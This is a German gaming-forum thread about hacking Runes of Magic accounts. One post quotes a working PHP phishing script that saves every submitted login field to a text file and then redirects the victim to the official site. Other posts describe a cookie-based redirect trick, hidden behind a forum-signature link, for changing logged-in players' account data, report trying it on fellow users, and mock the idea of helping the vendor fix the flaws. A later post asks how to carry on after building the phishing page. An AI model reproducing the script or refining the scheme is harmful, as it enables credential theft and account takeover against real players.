Register for your free account! | Forgot your password?

You last visited: Today at 03:20

  • Please register to post and access all features, it's quick, easy and FREE!

 

ROM Account hacken

Reply
 
Old   #31
 
elite*gold: 0
Join Date: Jun 2010
Posts: 31
Received Thanks: 2
jo.. kaum zu glauben aber wahr! ich bin irgendwie immer noch schockiert und mein kopf qualmt auch aber es klappt echt... echt mies !



wolleboiii is offline  
Old   #32
 
elite*gold: 6
Join Date: Dec 2007
Posts: 255
Received Thanks: 205
Quote:
Originally Posted by Atheuz View Post
Leider warst du dir nicht zu 1001% sicher, hatte es wolleboii auch nun genauer erklärt wieso das überhaupt geht.


Wo bleibt mein obligatorischer Kuchen?
Wo soll denn da bitte ein Cookieabfang/auslese stattfinden? Siehst du da irgendwas in dem PHP-Skript?

Du bekommst dein Kuchen wenn du allen von uns erklären kannst wieso das überhaupt geht. Vorher solltest du den Ball flach halten.

Das was du wahrscheinlich meinst hat nichts direkt mit dem Thema/Video zu tun. In dem Video wird dargestellt wie man sich eine Phishing-Website bastelt bzw. ganz einfach mit erstellt und die Eingaben nach dem Drücken auf den "Submit"-Button in eine neu erstellte Textdatei schreibt. Danach wird man forwarded/weitergeleitet auf runesofmagic.com damit man denkt man hat das alles grad auf der offiziellen Runes of Magic Page gemacht.


Digital Shadow is offline  
Old   #33
 
elite*gold: 0
Join Date: Feb 2010
Posts: 761
Received Thanks: 204
Krieg ich dann auch nen kuchen wenn ichs erklär?



Quote:
Originally Posted by Digital Shadow View Post
PHP Code:
<?php
header 
('Location: http://www.runesofmagic.com');
$handle fopen("usernames.txt""a");
foreach(
$_POST as $variable => $value) {
   
fwrite($handle$variable);
   
fwrite($handle"=");
   
fwrite($handle$value);
   
fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
exit;
?>


das ganze schreibt $variable und $value in das text dokument usernames.txt

wenn man die fwrite befehle anguckt und sie mit dem Skin der seite vergleicht kommt das raus

fwrite($handle, $variable); => Username
fwrite($handle, "="); => E-mail
fwrite($handle, $value); => Passwort
fwrite($handle, "\r\n"); => Land

nun wenn $variable und $value gespeichert werden speichert es den Eintrag vom Benutzernamen und vom Passwort



Kucheeeeeeen
Deset is offline  
Thanks
1 User
Old   #34
 
elite*gold: 0
Join Date: Feb 2010
Posts: 31
Received Thanks: 18
Kuchen kriegen nur die jenigen die, die Frage richtig beantworten ^^.

Das der angegebene PHP-Code bzw das Video ein Tutorial für eine einfache Write-Methode die Username, Pw und etc von einer gefälschten RoM-Seite speichert brauchst du keinem erklären, das dürften die meisten hier wissen

Die Frage oder besser die Forderung war, zu erklären wie bzw wieso es funktioniert das man mithilfe von Cookies die Benutzerdaten eines beliebigen (vorher eingeloggten) User umändern kann.

Erst dann gibs Kuchen ^^


Viviphyd is offline  
Old   #35
 
elite*gold: 81
Join Date: Jul 2005
Posts: 1,927
Received Thanks: 2,239
Quote:
Originally Posted by Digital Shadow View Post
Wo soll denn da bitte ein Cookieabfang/auslese stattfinden? Siehst du da irgendwas in dem PHP-Skript?

Du bekommst dein Kuchen wenn du allen von uns erklären kannst wieso das überhaupt geht. Vorher solltest du den Ball flach halten.

Das was du wahrscheinlich meinst hat nichts direkt mit dem Thema/Video zu tun. In dem Video wird dargestellt wie man sich eine Phishing-Website bastelt bzw. ganz einfach mit erstellt und die Eingaben nach dem Drücken auf den "Submit"-Button in eine neu erstellte Textdatei schreibt. Danach wird man forwarded/weitergeleitet auf runesofmagic.com damit man denkt man hat das alles grad auf der offiziellen Runes of Magic Page gemacht.
Vielleicht hättest du mal dir auch die ersten Beiträge durchlesen können, was ich erklärt habe war kein Phising oder sonst was, sondern eine alternative Methode. Lesen Jungs.
Atheuz is offline  
Old   #36
 
elite*gold: 0
Join Date: Feb 2010
Posts: 761
Received Thanks: 204
Quote:
Originally Posted by Digital Shadow View Post
Wo soll denn da bitte ein Cookieabfang/auslese stattfinden? Siehst du da irgendwas in dem PHP-Skript?
so wie ich das verstanden hab hat das nichts mit cookies zu tun...

wenn du die daten hast, kannst du dich auf der frogster seite einloggen und die daten ändern, so isset doch am einfachsten
Deset is offline  
Old   #37
 
elite*gold: 0
Join Date: Feb 2010
Posts: 31
Received Thanks: 18
Quote:
Originally Posted by Deset View Post
so wie ich das verstanden hab hat das nichts mit cookies zu tun...

wenn du die daten hast, kannst du dich auf der frogster seite einloggen und die daten ändern, so isset doch am einfachsten
Mit einer Phising-Page die Daten zu ergattern ist einfach, wirklich effizient dafür nicht, immerhin ist ja nicht jeder so blöd und checkt nicht falls z.B. die URL ne falsche ist.

Hingegen die Idee mit den Cookies ist nahezu brilliant. Man könnte z.B. einfach einen Link in seine RoM-Foren Signatur reinpacken, die führt dich dann zu irgend ner Seite z.B. Gildenhp. Dazwischen hast du aber nen selbergebastelten forward der die Acc-Daten einfach in ein Vorgegebenes Schema alá User1;Pw1, User2;Pw2 etc umändert.

Die große Frage ist jetzt eben ob das so einwandfrei klappt, nach Atheuz ja, nach den meisten anderen nein.

Ich persönlich würd mich über ne kleine Demonstration von Atheuz freuen falls er/sie es überhaupt hingekriegt hat. Dafür würds von mir nen extra großen Kuchen, geschmückt mit lauter kleinen Thx geben ^^
Viviphyd is offline  
Old   #38
 
elite*gold: 0
Join Date: Feb 2010
Posts: 761
Received Thanks: 204
ich habe es zusammen mit ihm probiert und als versuchskaninchen fungiert und es hat geklappt ^^
Deset is offline  
Old   #39
 
elite*gold: 81
Join Date: Jul 2005
Posts: 1,927
Received Thanks: 2,239
Quote:
Originally Posted by Viviphyd View Post
Mit einer Phising-Page die Daten zu ergattern ist einfach, wirklich effizient dafür nicht, immerhin ist ja nicht jeder so blöd und checkt nicht falls z.B. die URL ne falsche ist.

Hingegen die Idee mit den Cookies ist nahezu brilliant. Man könnte z.B. einfach einen Link in seine RoM-Foren Signatur reinpacken, die führt dich dann zu irgend ner Seite z.B. Gildenhp. Dazwischen hast du aber nen selbergebastelten forward der die Acc-Daten einfach in ein Vorgegebenes Schema alá User1;Pw1, User2;Pw2 etc umändert.

Die große Frage ist jetzt eben ob das so einwandfrei klappt, nach Atheuz ja, nach den meisten anderen nein. Die anderen wissen nichtmal um was es geht.

Ich persönlich würd mich über ne kleine Demonstration von Atheuz freuen falls er/sie es überhaupt hingekriegt hat. Dafür würds von mir nen extra großen Kuchen, geschmückt mit lauter kleinen Thx geben ^^
Endlich jemand der die Sache versteht, ja genau so könnte man das machen. Es funktioniert auch. Habs mit Deset und Wolleboii probiert.

Man müsste nur das ganze etwas verfeinern, das z.B anhand der IP ein eigener Benutzername mit PHP generiert wird und in einer Datenbank oder Textdatei gespeichert wird, oder das man lieber komplett Ajax verwendet. Ich schick dir das per PN.
Atheuz is offline  
Thanks
1 User
Old   #40
 
elite*gold: 0
Join Date: Jun 2010
Posts: 31
Received Thanks: 2
genau , so würde das dann funktionieren. Der einzige Nachteil ist das die Leute eingeloggt sein müssen bei der yusho seite und ingame nicht eingeloggt sein dürfen... ansonsten eine super ... naja eher ziemlich böse sache

aber es geht ja eh nur um die theorie

btw. morgen erstma *kaffee hebt*
wolleboiii is offline  
Old   #41
 
elite*gold: 0
Join Date: Jun 2008
Posts: 143
Received Thanks: 26
danke für die info mädels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach wär dann helft dochmal frogster den server sicher zu machen.^^
metinric is offline  
Old   #42
 
elite*gold: 24
Join Date: Apr 2010
Posts: 36,075
Received Thanks: 6,346
Quote:
Originally Posted by metinric View Post
danke für die info mädels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach wär dann helft dochmal frogster den server sicher zu machen.^^
Natürlich, ich bewerbe mich mal bei Frogster und sage ich helfe euch eure Server sicher zu machen.
So leicht wie du dir das vorstellst ist das nicht.
Drewfire is offline  
Old   #43
 
elite*gold: 0
Join Date: Feb 2010
Posts: 761
Received Thanks: 204
Quote:
Originally Posted by metinric View Post
danke für die info mädels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach wär dann helft dochmal frogster den server sicher zu machen.^^
wozu?

ja ein Problem weniger, und für jeden Fehler der behoben wird, werden 2 neue gefunden, außerdem was bringt uns es, denen zu helfen?
Deset is offline  
Old   #44
 
elite*gold: 24
Join Date: Apr 2010
Posts: 36,075
Received Thanks: 6,346
Quote:
Originally Posted by Deset View Post
wozu?

ja ein Problem weniger, und für jeden Fehler der behoben wird, werden 2 neue gefunden, außerdem was bringt uns es, denen zu helfen?
Da stimme ich dir vollkommen zu.
Wir wollen Vorteile durch diese Bugs und sie nicht beheben lassen
Drewfire is offline  
Old   #45
 
elite*gold: 0
Join Date: Jun 2010
Posts: 6
Received Thanks: 0
Schön das ihr so GEIL auf RoM Acc Hack seit... mir wurde mein Account gestern gehackt... Alles ist weg komplett alles....

und ich will jetzt auch einen RoM Acc hacken,damit ich bessere Sachen habe,ich habe das alles was auf dem Video steht gemacht,jeden Schritt verfolgt... Was muss ich als nächstes machen,wenn ich auf der erstellten Homepage alles gesavet habe usw...?


Emblionvirus is offline  
Reply



« Previous Thread | Next Thread »

Similar Threads
Account hacken?
Hi, ich wollte ma fragn ob ma nen Account hacken kann mit irgend nem Programm, wenn man den Benutzernamen weis (damit das Ding das PW hackt). Geht...
5 Replies - Last Chaos
account hacken
hab ne frage vor kurzem hat mein freund mir ziemlich viele sachen von meinem acc geklaut weil er mein pw wusste.ich will mir die sachen jetzt auch...
8 Replies - Metin2 Main - Discussions / Questions
account hacken
Hi hab eben auf einer hacker seite gelesen das die eine sicherheitslücke gefunden haben womit man blizzards automailer austrickst um an die account...
11 Replies - WoW Main - Discussions / Questions
account hacken?
Wie kann ich na eigentlicj ne Account hacken??? Hab gute Gründe! Wäre nice wenn mir da jemand was sagen kann. Schon mal danke.
19 Replies - Cabal Main - Discussions / Questions
Account hacken
Hi, Wie einfach ist es eigentlich nen Account zu hacken/cleanen ? Wurde neulich angeschrieben kp warum das ich bald gehackt werd... ich glaub da...
11 Replies - Kal Online



All times are GMT +1. The time now is 03:20.


Powered by vBulletin®
Copyright ©2000 - 2016, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

Support | Contact Us | FAQ | Advertising | Privacy Policy
Copyright ©2016 elitepvpers All Rights Reserved.